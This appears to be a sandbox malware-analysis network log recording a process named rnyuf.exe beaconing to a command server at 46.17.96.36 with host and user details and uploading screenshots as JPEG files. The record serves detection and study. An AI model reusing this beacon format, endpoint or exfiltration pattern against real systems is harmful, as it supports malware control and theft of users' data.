                                        Aug 29, 2021 22:28:02.253407955 CEST12276OUTData Raw: c7 1d fa 51 60 9a a7 f6 8d af 99 a7 ed 4f 35 37 37 d8 55 70 32 32 73 b7 8f ad 17 66 8a a5 4d 35 fc 0f 9c 3e 20 68 16 fe 18 f1 c6 a7 a4 5a b1 68 21 64 64 e0 f0 1d 15 f1 c9 27 03 76 39 24 f1 5c d6 33 5d ef c6 4f f9 2a da d7 fd b0 ff 00 d1 11 d7 08
                                        Data Ascii: Q`O577Up22sfM5> hZh!dd'v9$\3]O*5X11F)&*MbR@E-%QE (JuJZ1E(QL(QEQEQERRS$Z(ZJZKLQE%JcS!1(HPcu!6\RPQE!
                                        Aug 29, 2021 22:28:02.285351992 CEST12290OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:28:02.317589998 CEST12292OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:28:02.515764952 CEST12371INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:02 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        163192.168.2.44990246.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:01.840262890 CEST12269OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:01.919353962 CEST12269INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:01 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        164192.168.2.44990346.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:02.078275919 CEST12270OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:02.149172068 CEST12270INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:02 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        165192.168.2.44990446.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:02.300124884 CEST12291OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:02.376219034 CEST12323INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:02 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        166192.168.2.44990546.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:02.539150953 CEST12372OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:02.610326052 CEST12372INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:02 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        167192.168.2.44990646.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:02.816734076 CEST12373OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:02.893512964 CEST12463INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:02 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        168192.168.2.44990746.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:02.818630934 CEST12374OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----1a6eec0903b36103c3c811a8fa9b0fbd
                                        Host: 46.17.96.36
                                        Content-Length: 110771
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:02.818785906 CEST12374OUTData Raw: 2d 2d 2d 2d 2d 2d 31 61 36 65 65 63 30 39 30 33 62 33 36 31 30 33 63 33 63 38 31 31 61 38 66 61 39 62 30 66 62 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------1a6eec0903b36103c3c811a8fa9b0fbdContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:02.818949938 CEST12384OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:02.819061995 CEST12387OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:02.853719950 CEST12400OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:02.853780031 CEST12403OUTData Raw: 00 77 35 ca 2f 89 75 a5 bc 9e e7 ed 70 b9 9e 14 82 48 64 b5 89 e0 31 a6 36 a8 84 a9 8c 05 c7 18 5e 39 c7 53 55 6f 75 4d 4b 53 8e e2 3b db b3 2a 5c 5c 0b 99 41 45 1b a4 0b b4 1e 07 40 a7 01 7a 01 d0 0a e5 f6 75 3f af 4b 7f c1 f5 3a 7d a5 36 ef fd
                                        Data Ascii: w5/upHd16^9SUouMKS;*\\AE@zu?K:}6wvrxfEt_-t}NCy0ms;cqBVeq?u4Wv&4,11bsWX&obldP7*\qqUV;cm|#?eR7WX{H^_U`_YiOy
                                        Aug 29, 2021 22:28:02.854578972 CEST12407OUTData Raw: b3 13 c9 24 f7 34 66 bb 23 b2 4c e4 95 9b 6d 0e f2 d4 f7 a4 31 0f 5a 4e 69 72 6a b4 27 51 3c 9f 7a 3c 93 4b b8 d2 ef 34 59 0e f2 19 e5 35 21 42 2a 5f 33 da 9d e6 0f 4a 2c 85 76 56 c1 f4 a5 c7 b5 58 dc a7 b5 38 04 3d a8 e4 0e 72 a5 15 68 c6 9d 8d
                                        Data Ascii: $4f#Lm1ZNirj'Q<z<K4Y5!B*_3J,vVX8=rh'Mjoy+dCKRy,)l;Qf;SNYQE%(QKLAEPEJ(,!(bbQE)iZ){!i`Z))EIAKE-)j,(SR>Sii:@PE-B
                                        Aug 29, 2021 22:28:02.854617119 CEST12412OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:28:02.888704062 CEST12423OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:28:02.888798952 CEST12441OUTData Raw: 1c a2 16 0a 36 95 e0 48 07 5a bf 79 7f a3 c5 e3 ab fd 76 2d 6e d2 e2 d6 f0 de 6d 48 a1 9c 48 9e 64 12 2a ee 0d 18 1c b3 01 c1 3d 7d 39 a7 ed ea 59 bb 7f 37 e1 b0 4a 85 3b d9 3e a6 24 1a 3c af 15 ec b7 57 16 f6 29 63 70 96 d7 26 e3 7f ee dd b7 e3
                                        Data Ascii: 6HZyv-nmHHd*=}9Y7J;>$<W)cp&V$,Wn|/,76yqs*d$v5U]r;eex+\kl)BD]:'h<7 I\KYhqOU2}.KqcMp4M*R6v6
                                        Aug 29, 2021 22:28:02.889271021 CEST12446OUTData Raw: 4e 02 80 38 a7 01 4c 86 ce 97 c2 6b 98 f5 1f fa e4 3f 91 ae 74 f0 ed f5 ae a7 c1 f1 ee 83 53 3f f4 cb fa 1a e6 18 7c c7 eb 5c 14 25 fb fa 8b d0 ea ae ad 42 0f d4 6d 18 a5 c5 18 ae db 9c 37 12 9c 28 c5 00 50 20 a5 a5 c5 2e 3d aa 5b 10 98 a3 14 f0
                                        Data Ascii: N8Lk?tS?|\%Bm7(P .=[xF?AR[i?CU?H=9WeImd[k4>f)w5X*sJ1]/f@7yZKI/&:Z{77?/mZ_Z+
                                        Aug 29, 2021 22:28:02.994050026 CEST12485INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:02 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        169192.168.2.44990846.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:03.052992105 CEST12486OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:03.130621910 CEST12486INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:03 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        17192.168.2.44975246.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:16.101324081 CEST2852OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688c
                                        Host: 46.17.96.36
                                        Content-Length: 107127
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:16.101604939 CEST2852OUTData Raw: 2d 2d 2d 2d 2d 2d 36 66 32 62 38 65 63 31 32 35 38 33 33 62 66 66 65 36 31 63 33 30 38 62 30 34 30 31 36 38 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------6f2b8ec125833bffe61c308b0401688cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:16.101866961 CEST2862OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:16.102020025 CEST2865OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:16.136598110 CEST2868OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:16.136637926 CEST2870OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:27:16.136723042 CEST2873OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:27:16.136852980 CEST2885OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:16.136887074 CEST2888OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:16.137051105 CEST2890OUTData Raw: c9 6e 8e 78 21 1e b4 a1 71 5b de 5d b3 75 41 49 f6 3b 56 f6 a3 d8 8f eb 2b aa 30 f1 4e 03 35 b2 74 d8 8f dd 62 29 87 4a 3d 9c 7e 22 8f 64 d0 7d 62 06 5e da 70 15 7c e9 92 8e 98 35 1b 58 cc bc ed a3 91 87 b5 8b ea 56 c5 2e 2a 53 6e e3 aa 9a 6f 96
                                        Data Ascii: nx!q[]uAI;V+0N5tb)J=~"d}b^p|5XV.*SnoGo(OhNT7O)UCe*ANO3+<]S<y^G^]*chT)Fc)K|]j}(BK,K\S&Kp+b1Eq1Y
                                        Aug 29, 2021 22:27:16.171897888 CEST2893OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:16.280502081 CEST2960INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:16 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        170192.168.2.44990946.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:03.286886930 CEST12487OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:03.364206076 CEST12576INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:03 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        171192.168.2.44991046.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:03.289186954 CEST12487OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:03.289207935 CEST12487OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:03.289426088 CEST12497OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:03.289490938 CEST12500OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
